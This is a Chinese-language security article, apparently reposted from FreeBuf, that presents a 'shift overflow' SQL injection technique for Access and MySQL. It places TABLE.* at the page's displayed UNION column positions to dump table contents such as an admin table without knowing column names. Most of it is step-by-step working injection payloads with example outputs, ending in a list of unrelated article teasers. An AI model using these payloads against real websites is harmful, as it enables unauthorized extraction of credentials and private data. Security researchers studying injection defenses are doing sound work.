mysql偏移注入_移位溢注:告别靠人品的偏移注入

*本文原创作者:SeagullGR,本文属FreeBuf原创奖励计划,未经许可禁止转载

在Access数据库类型注入的时候,我们获取不到列名(前提是有表名),一般会选择使用偏移注入,但是这种注入方式往往借助的是个人的人品,且步骤繁琐。本文中我们研究了一种新的注入技术让“偏移注入不再需要人品”。在这里定义这种注入技术为:“移位溢注技术”。它适用于ACCESS和MYSQL(任何版本)。

我们先来看看普通的偏移注入步骤:1.判断注入点

2.order by 判断长度

3.判断表名

4.联合查询

5.获取表中列数:union select 1,2,3,4,..,* from TABLE

6.开始偏移注入:TABLE as a inner join TABLE as b on a.id=b.id

由于步骤6的方法过于需要人品值,且语句繁琐,因此在这里,我们研究新的注入技术。

首先来看看步骤6语句的整体意思:

步骤6的语句,表示给TALBE取2个别名,然后分别用别名取查询TALBE的内容(表a和表b);而on a.id = b.id 这样的条件是为了满足语法需求,实际并没有作用,因为相同内容的表,相同字段内容一定相同。

这时,我们再回过头来看步骤5:

由于联合查询中select后面添加数字的目的是为了让联合查询返回接结果和网站正常查询返回的结果的列数一致(不一致数据库会报错,页面无法显示),且*表示通配符,可以表示整个表格所有列;因此这里通过数字来占位,并使用*来替代TABLE中的所有列,使得联合查询可以完成,并推算出*的值。

这时候我们继续研究偏移注入的整体公式方法,发现即使使用多级偏移注入也需要一定的概率(人品值)才可以得到想要的结果,所以我们就尝试研究新的方法能不能替换这种不固定概率的方法。

现在我们重新整理一下SQL语句,从联合查询开始:

1.原union语句:union select 1,2,3,..,p..,n from TABLE

(p=页面爆出的数字,可能有多个p1,p2..;n=原网站查询的总列数;TALBE=我们获得的表名;下面开始就使用上述字母的定义)

2.新语句:union select 1,2,3,..,p-1,TABLE.*,p+k,..,n from TABLE where 字段名 = 字段内容

在p的位置爆出TALBE表中第一个字段的内容(其他位置还可能爆出更多内容。这里如果存在已知字段名可以使用,没有就不用,一般id这个字段时存在的,可以使用id = 1来显示第一行)union select 1,2,3,..,p-2,TABLE.*,p+k-1,..,n from TABLE where 字段名 = 字段内容

在p的位置爆出TALBE表中第二个字段的内容(其他位置还可能爆出更多内容)union select 1,2,3,..,p-3,TABLE.*,p+k-2,..,n from TABLE where 字段名 = 字段内容

在p的位置爆出TALBE表中第三个字段的内容(其他位置还可能爆出更多内容)

注:这里一定是TALBE.*而不是*

3.1 以此类推可以爆出TALBE的每一列内容。

3.2 如果p

原理

1.由原语句:union select 1,2,3,..,p..,n-k,* from TABLE 可以得出该联合查询的目的是构造和原网站相同列数的查询结构,使得页面上可以显示对应的数字;这条语句相当于是做了两次查询并将它们的结果合并,第一次做了select 1,2,3,..,n-k from TALBE ,第二次做了select * from TALBE ,然后将它们的结果合并。

这可以参考mysql的语句:select 1,2,3,4,5,admin.* from admin;

3e6b937b19c0244334007971b114a001.png

8643f67db75bcd3bcb430a5b7e563608.png

c7f844bacb9a8fe897507d71ec762833.png

2.只要满足原理1的要求,保障联合查询的结果和原网站查询的结果列数一致即可;因此可以将TALBE.*向前移动至页面显示的数字处来爆出TALBE列中的内容。

这可以参考mysql的语句:

select 1,2,3,4,5,6,7,8,9,10 from news where id =1 union select 1,2,3,4,5,6,7,admin.* from admin;

select 1,2,3,4,5,6,7,8,9,10 from news where id =1 union select 1,2,3,admin.*,7,8,9,10 from admin;

注:假设数字4、5在页面显示。

由下图可知,其实数据已近查询出来,但是页面没有显示,这个是通过平移查询结果到页面显示的数字上去,即可爆出敏感字段。

63e407f0d03ac7ca6363760955d9f6a2.png

337aef57ddafbfcc92f149c72ecdcd74.png

例子:

步骤1:判断注入点是否存在

7ead7876e83647e3a756759c387f1efe.png

步骤2:判断字段长度:order by 35

611ae0bf4b131c6eb27268942b385964.png

5fd9ae32107ed8569dcf73c5ef0535a8.png

步骤3:获得表名(必备条件)   and exists(select * from admin)

58c41fc9d250e2c37a57ebb6e7157aab.png

步骤4:获取不了列名(当尝试多个常用字段名以后,最终还是发现无法获得字段名)

步骤5:使用联合查询(union select)

03cb1b628380909f2d7bfe32285203a4.png

步骤6:使用新注入技术方法

(1)获取admin表的列数:

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,* from admin——返回错误页面

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,* from admin——返回错误页面

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,* from admin——返回错误页面

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,* from admin——返回错误页面

...

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,* from admin——返回步骤5页面,因此admin表的列数为6

6501d324667a927d89ff06ff08e1ec86.png

4a29e28593adfbe640dce593b57303bb.png

e8bbd165d70efbfce4c40e49d70a9acb.png

(2)由于网页中包含连续数字,表示可以显示连续的查询结果,构造SQL语句查询前四列第一行。

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,admin.*,34,35 from admin

7d3c843de110f29d19a2ea899b401356.png

69f723e4ad093b4bae37315dab45cd09.png

(3)由第一行第一列内容为1,可以猜测该表有id字段,因此修改语句获取其他行。

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,admin.*,34,35 from admin where id = 3

01905fd457c17f6e5ca4e6d6522eb01c.png

总结

在这里我们命名这种新注入技术为"移位溢注"。由此如果MYSQL小于5.0的情况下所具备的条件和ACCESS一样,也可以使用此方法注入,如果是MYSQL大于5.0的版本,使用此方法可以省去获得列名的步骤。

*本文原创作者:SeagullGR,本文属FreeBuf原创奖励计划,未经许可禁止转载(MST.LAB HI-OURLIFE 米斯特实验室 @ Seagull)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/472872.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Jquery 中的CheckBox、 RadioButton、 DropDownList的取值赋值

1.获取选中值,三种方法都可以: $(input:radio:checked).val(); $("input[typeradio]:checked").val(); $("input[namerd]:checked").val(); 2.设置第一个Radio为选中值: $(input:radio:first).attr(checked, …

LeetCode 1769. 移动所有球到每个盒子所需的最小操作数(前缀和)

文章目录1. 题目2. 解题1. 题目 有 n 个盒子。给你一个长度为 n 的二进制字符串 boxes ,其中 boxes[i] 的值为 0 表示第 i 个盒子是 空 的,而 boxes[i] 的值为 1 表示盒子里有 一个 小球。 在一步操作中,你可以将 一个 小球从某个盒子移动到…

代写python代码一般多少钱_代写CO 353课程作业、代做Python程序设计作业、代写Python语言作业...

代写CO 353课程作业、代做Python程序设计作业、代写Python语言作业 日期:2020-03-17 11:22 CO 353 - Homework assignment 4 Winter ’20 Page 1 CO 353 - Winter ’20 Homework assignment #4: Instructions: ? You may use any result proved in class directly,…

JNative用法注意事项

公司要做个跟设备打交道的web系统,需要java调用dll。搞java的同事说JNative看起来挺好使的,找俺帮忙调通。用的是1.3.1版本 环境设置。 JNative的调试信息需要打开才能更清楚些,要不总是说没加载库,跟没说一样。 System.setProper…

虚拟主机不支持mysql_虚拟主机能用mysql么

原标题:虚拟主机能用mysql么虚拟主机能用mysql么?虚拟主机能用mysql的。MySQL数据库一般与Linux系统搭配使用较多,绝大部分的服务商都会提供支持MySQL数据库的虚拟主机产品。MySQL是一种关系数据库管理系统,关系数据库将数据保存在…

python3知识点汇总_35个高级Python知识点总结

No.1 一切皆对象 众所周知,Java中强调“一切皆对象”,但是Python中的面向对象比Java更加彻底,因为Python中的类(class)也是对象,函数(function)也是对象,而且Python的代码和模块也都是对象。 Py…

LeetCode 1770. 执行乘法运算的最大分数(DP)

文章目录1. 题目2. 解题1. 题目 给你两个长度分别 n 和 m 的整数数组 nums 和 multipliers ,其中 n > m ,数组下标 从 1 开始 计数。 初始时,你的分数为 0 。 你需要执行恰好 m 步操作。在第 i 步操作(从 1 开始 计数&#x…

统计--过滤(筛选)索引的统计信息过期问题测试

基础知识普及: 对于筛选索引,MSDN如是说: 筛选索引是一种经过优化的非聚集索引,尤其适用于涵盖从定义完善的数据子集中选择数据的查询。 筛选索引使用筛选谓词对表中的部分行进行索引。 与全表索引相比,设计良好的筛选…

IDEA连接mysql出现时区错误_idea连接数据库时区错误

错误界面IDEA连接mysql,地址,用户名,密码,数据库名,全都配置好了,点测试连接,咔!不成功!界面是这样的,翻译过来就是:服务器返回无效时区。进入“高…

springboot listener_Springboot 监听redis key的过期事件

项目中常常会碰到这样的需求,用户下订单后,30分钟未完成自动取消订单的功能。有人说这个简单呀,写个定时任务就搞定了。除了定时任务之外,难道就没有其他的方法来实现吗?有--Redis 的键空间通知事件。在Redis 2.8.0之后…

LeetCode 1771. 由子序列构造的最长回文串的长度(最长回文子序)

文章目录1. 题目2. 解题1. 题目 给你两个字符串 word1 和 word2 ,请你按下述方法构造一个字符串: 从 word1 中选出某个 非空 子序列 subsequence1 。从 word2 中选出某个 非空 子序列 subsequence2 。连接两个子序列 subsequence1 subsequence2 &…

python牛顿法计算平方根_常用的平方根算法详解与实现

本文从属于笔者的数据结构与算法系列文章。 SquareRoot 平方根计算一直是计算系统的常用算法,本文列举出几张简单易懂的平方根算法讲解与实现。其中Java版本的代码参考这里 Reference Babylonian:巴比伦算法/牛顿法 巴比伦算法可能算是最早的用于计算$sqrt{S}$的算法…

mysql主辅同步报错_mysql数据库主辅同步Slave_IO_Running,Slave_SQL_Running错误

Slave_IO_Running:连接到主库,并读取主库的日志到本地,生成本地日志文件Slave_SQL_Running:读取本地日志文件,并执行日志里的SQL命令。这个错误是出现在我重启电脑之后。从以上图片来看,我遇到的错误是第二条&#xff…

R.java文件介绍

HelloWorld工程中的R.java文件 package com.android.hellworld; public final class R { public static final class attr { } public static final class drawable { public static final int icon0x7f020000; } public static final class layou…

移动计算比移动数据更划算

learn from 从0开始学大数据(极客时间) 数据太大(PB级别),将程序发送到数据所在地方进行计算,比移动数据更划算 如何实现的: 将大规模数据存储在集群的所有服务器上,(H…

什么是spring_Spring 源码第三弹!EntityResolver 是个什么鬼?

上篇文章和小伙伴们说了 Spring 源码中 XML 文件的解析流程,本来可以继续往下走看加载核心类了,但是松哥还是希望能够慢一点,既然要学就学懂,在 XML 文件解析的过程中还涉及到一些其他的类和概念,因此我就先用几篇文章…

mysql5.7免安版配置_mysql5.7免安装版配置

JS产生随机数的几个用法!C++和java多态的区别C和java多态的区别 分类: Java2015-06-04 21:38 2人阅读 评论(0) 收藏 举报  转载自:http://www.cnblogs.com/plmnko/archive ...永远不要在Linux 执行的 10 个最危险的命令转…

简述C++程序编写的过程

学习C编程(相关C编程-基础知识篇)乃至于所有的编程语言每当你编写一个程序从编写到最后得到运行结果要经历以下一些步骤:1、用C语言编写程序用高级语言编写的程序称为“源程序”(source program)。C的源程序是以.cpp作为后缀的(cpp…

从RAID看垂直伸缩到水平伸缩的演化

learn from 从0开始学大数据(极客时间) 大规模数据存储问题: 容量问题,数据量超过磁盘容量读写速度,磁盘读写慢数据可靠性,磁盘寿命问题 RAID(独立磁盘冗余阵列) 是将多块普通磁盘…

linux安装g++编译器_Ubuntu Desktop下配置Rosetta安装教程

作者: 吴炜坤本文仅在虚拟机环境下测试,可能实际操作中会遇到不同的问题本文是新手向的安装教程,如果需要在CentOS上安装,可以参考本人其他安装教程由于许多新人朋友在学习Rosetta过程中,通常操作系统选择的都是带美丽漂亮界面便于…